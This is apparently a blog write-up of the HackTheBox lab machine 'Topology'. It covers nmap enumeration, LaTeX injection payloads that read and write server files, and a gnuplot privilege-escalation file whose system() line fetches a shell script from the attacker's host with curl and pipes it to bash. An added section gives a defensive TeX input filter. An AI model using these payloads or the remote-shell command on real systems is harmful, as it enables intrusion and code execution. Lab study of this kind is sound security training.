HackTheBox - Topology

Machine ID: 546

tags: hackthebox linux easy

Initial Enumeration

nmap

# Nmap 7.93 scan initiated Sun Jun 11 19:01:25 2023 as: nmap -sC -sV -oN nmap/topology 10.10.11.217
Nmap scan report for 10.10.11.217
Host is up (0.053s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 dcbc3286e8e8457810bc2b5dbf0f55c6 (RSA)
| 256 d9f339692c6c27f1a92d506ca79f1c33 (ECDSA)
|_ 256 4ca65075d0934f9c4a1b890a7a2708d7 (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Miskatonic University | Topology Group
|_http-server-header: Apache/2.4.41 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Jun 11 19:01:40 2023 -- 1 IP address (1 host up) scanned in 14.83 seconds

Web

We find potential users: lklein, vdasisley and dabrahams.

We also see a subdomain: latex.topology.htb

Visiting the LaTeX Equation Generator we see this.

And visiting the index we see that directory listing is enabled.

Checking the log file, we see that it is using pdfTeX, Version 3.14159265-2.6-1.40.20

Trying injection on that, we get

\newread\file
\openin\file=/usr/share/texmf/web2c/texmf.cnf
\read\file to\line
\text{\line}
\closein\file

Trying a file write also leads to

\newwrite\outfile
\openout\outfile=cmd.tex
\write\outfile{Hello-world}
\closeout\outfile

Running a command and monitoring /tempfiles we see

Trying to use filecontents to write to a file

\documentclass{article}

\begin{document}

% Start the filecontents environment with the desired file name
\begin{filecontents*}{myFile.txt}
This is the content of my file.
It can have multiple lines.
\end{filecontents*}

% Some text in the document
Lorem ipsum dolor sit amet, consectetur adipiscing elit. Nullam eu justo nec elit ullamcorper semper eget a lectus.

\end{document}

We get "input too long".

\begin{filecontents*}{myFile.txt}
Content of the file.
\end{filecontents*}

Using this, the file is created but blank.

After trying the same locally, we figure out that the newline is mandatory.

So we URL-encode the payload and can write to a file

and can run commands.

Ref: https://texdoc.org/serve/latex2e.pdf/0
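
A defensive counterpart to the injection steps above, as an added example that is not part of the original write-up: an allowlist check an equation renderer could run before handing input to pdfTeX. The macro and environment allowlists, the length limit and the function name are assumptions, and the samples are constructed from the payload shapes shown above.

```python
import re

# Assumed allowlist for a math-only field; extend it for your deployment.
ALLOWED_MACROS = {"frac", "sqrt", "sum", "int", "alpha", "beta", "pi",
                  "infty", "cdot", "times", "left", "right", "text"}
ALLOWED_ENVS = {"matrix", "pmatrix", "cases"}
ALLOWED_SYMBOLS = set(",;!{}|\\ ")   # control symbols such as \, \{ and \\
MAX_LEN = 200                          # assumed limit for a one-line equation

TOKEN = re.compile(r"\\([A-Za-z@]+|.)", re.S)   # TeX control word or symbol
ENV_ARG = re.compile(r"\{([A-Za-z*]+)\}")       # {name} after \begin or \end


def check_equation(src):
    """Return the reasons to reject src; an empty list means it is accepted."""
    problems = []
    if len(src) > MAX_LEN:
        problems.append("input too long")
    # filecontents needs real newlines, so a one-line field refuses them.
    if any(ord(c) < 32 or ord(c) == 127 for c in src):
        problems.append("control character in input")
    # ^^5c is TeX notation for a backslash and would hide a macro name.
    if "^^" in src:
        problems.append("^^ character escape")
    for m in TOKEN.finditer(src):
        name = m.group(1)
        if name in ("begin", "end"):
            arg = ENV_ARG.match(src, m.end())
            env = arg.group(1) if arg else "(missing)"
            if env not in ALLOWED_ENVS:
                problems.append("environment not allowed: " + env)
        elif name not in ALLOWED_MACROS and name not in ALLOWED_SYMBOLS:
            problems.append("macro not allowed: \\" + name)
    return problems


# Constructed samples: the payload shapes from this write-up plus a benign one.
SAMPLES = {
    "benign": r"\frac{a}{b} + \sqrt{x^2}",
    "read": r"\newread\file \openin\file=/usr/share/texmf/web2c/texmf.cnf",
    "write": r"\newwrite\outfile \openout\outfile=cmd.tex",
    "filecontents": "\\begin{filecontents*}{myFile.txt}\nContent of the file.\n\\end{filecontents*}",
    "escaped": r"^^5copenin\file=cmd.tex",
}

if __name__ == "__main__":
    for label, src in SAMPLES.items():
        print(label, check_equation(src))
```

Treat the filter as a second layer: the TeX-side controls are `shell_escape = f` together with `openin_any = p` and `openout_any = p` in texmf.cnf.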

www-data Shell

Privilege Escalation

Running pspy64 we see

We create a .plt file:

set encoding iso_8859_1
set key right bottom #font "Helvetica,17"
set ylabel "Lookup error probability" font "Helvetica,17"
set xlabel "Hight of the reader (m)" font "Helvetica,17"
set xtics font "Helvetica,15"
set ytics font "Helvetica,15"
set size 0.75, 1.05
set terminal postscript eps enhanced color #"Helvetica" 16 #size 3.5in,3in
set grid
set key spacing 1.5

set output "ProbError6x6.eps"
list(start,end,increment)=system(sprintf("seq %g %g %g", start, increment, end))

system("curl http://10.10.14.22:8000/shell.bash | bash")

Author: Shubham Kumar
Link: https://f3v3r.in/htb/machines/retired/topology/
Copyright Notice: All articles in this blog are licensed under CC BY-NC-SA 4.0 unless stating additionally.